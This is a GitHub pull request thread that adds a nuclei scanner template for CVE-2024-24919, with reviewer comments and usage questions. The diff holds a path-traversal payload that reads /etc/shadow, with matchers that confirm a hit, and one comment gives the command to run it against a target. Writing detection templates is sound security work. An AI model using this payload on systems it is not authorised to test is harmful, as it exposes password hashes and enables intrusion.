### PR TITLE
CVE-2024-24919

### PR DESCRIPTION
**Pull request by johnk3r**
### Template / PR Information

I've validated this template locally?
- [X] YES
- [ ] NO

### CODE REVIEW

File: http/cves/2024/CVE-2024-24919.yaml [hunk 1]
```diff
@@ -0,0 +1,36 @@
...
+        aCSHELL/../../../../../../../etc/shadow
+
+    matchers-condition: and
+    matchers:
+      - type: regex
+        part: body
+        regex:
+          - "root:"
+          - "nobody:"
+        conditio: and
```
Comment (AaronChen0) [inline http/cves/2024/CVE-2024-24919.yaml:32]: condition

**Comment by GeorginaReeder** [comment]
Thanks so much for your contribution @johnk3r !

**Review by DhiyaneshGeek — APPROVED** [review]

**Comment by scottdharvey** [comment]
Does this entry get automatically added to `cves.json` or should that be an additional PR?

**Comment by DhiyaneshGeek** [comment]
Hi @scottdharvey it should be added now , can you confirm 

image

Thanks

**Comment by Dev0psSec** [comment]
how to use it?

**Comment by frankkyounger** [comment]
> how to use it?

nuclei  url "https://target.com/" -t ./cve-2024-24919.yaml 

> how to use it?

**Comment by Dev0psSec** [comment]
modified and now it's working. how can I add my changes?

**Comment by DhiyaneshGeek** [comment]
@Dev0psSec Feel free to raise a PR with changes we will review them

**Pull request merged**